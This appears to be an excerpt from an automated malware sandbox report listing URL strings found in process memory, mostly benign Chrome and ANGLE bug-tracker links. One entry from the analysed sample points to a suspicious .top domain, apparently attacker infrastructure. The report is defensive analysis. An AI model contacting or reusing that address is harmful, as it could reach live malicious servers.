Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1714355833.000077D402220000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4551
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4633
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4722
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4836
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4901
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4937
Source: chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1717477312.000077D4028CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5007
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5055
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5061
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5281
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5371
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5375
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5421
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5430
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5535
Source: chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716578996.000077D4026A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5658
Source: chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1717223028.000077D402830000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5750
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5881
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5901
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5906
Source: chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716578996.000077D4026A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6041
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6048
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6141
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6248
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6439
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6651
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6692
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6755
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6860
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6876
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/68763
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6878
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6929
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/6953
Source: chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1718020308.000077D4029D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7036
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7047
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7172
Source: chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1717223028.000077D402830000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7279
Source: chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716578996.000077D4026A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7370
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7406
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7488
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7553
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7556
Source: chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1717477312.000077D4028CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7724
Source: chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1717223028.000077D402830000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7760
Source: chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716578996.000077D4026A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7761
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8162
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8215
Source: chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8229
Source: chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716578996.000077D4026A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1717223028.000077D402830000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8280
Source: chrome.exe, 0000000A.00000002.1715548648.000077D40240C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 0000000A.00000002.1717223028.000077D402830000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: chrome.exe, 0000000A.00000002.1715027438.000077D402318000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://developer.chrome.com/extensions/external_extensions.html)
Source: chrome.exe, 0000000A.00000002.1714614086.000077D4022B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: SwJD3kiOwV.exe, 00000002.00000003.1295175578.000000000793F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322
Source: SwJD3kiOwV.exe, 00000002.00000003.1295175578.000000000793F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://issuetracker.google.com/200067929
Source: chrome.exe, 0000000A.00000003.1695928537.000077D4032D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696022186.000077D4032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696270052.000077D403300000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696076889.000077D4031C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jsbin.com/temexa/4.
Source: chrome.exe, 0000000A.00000003.1695928537.000077D4032D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697390107.000077D403380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696971124.000077D40320C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696022186.000077D4032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1721454553.000077D402F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696270052.000077D403300000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696051656.000077D403334000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697530555.000077D403458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697244740.000077D4025AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696905806.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696839708.000077D402F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696874529.000077D403124000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716038275.000077D4024FF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696076889.000077D4031C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chrome.exe, 0000000A.00000003.1695928537.000077D4032D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697390107.000077D403380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696971124.000077D40320C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696022186.000077D4032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1721454553.000077D402F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696270052.000077D403300000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696051656.000077D403334000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697530555.000077D403458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697244740.000077D4025AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696905806.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696839708.000077D402F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696874529.000077D403124000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716038275.000077D4024FF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696076889.000077D4031C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chrome.exe, 0000000A.00000003.1695928537.000077D4032D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697390107.000077D403380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696971124.000077D40320C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696022186.000077D4032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1721454553.000077D402F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696270052.000077D403300000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696051656.000077D403334000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697530555.000077D403458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697244740.000077D4025AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696905806.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696839708.000077D402F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696874529.000077D403124000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716038275.000077D4024FF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696076889.000077D4031C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chrome.exe, 0000000A.00000003.1695928537.000077D4032D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697390107.000077D403380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696971124.000077D40320C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696022186.000077D4032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1721454553.000077D402F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696270052.000077D403300000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696051656.000077D403334000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697530555.000077D403458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697244740.000077D4025AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696905806.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696839708.000077D402F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 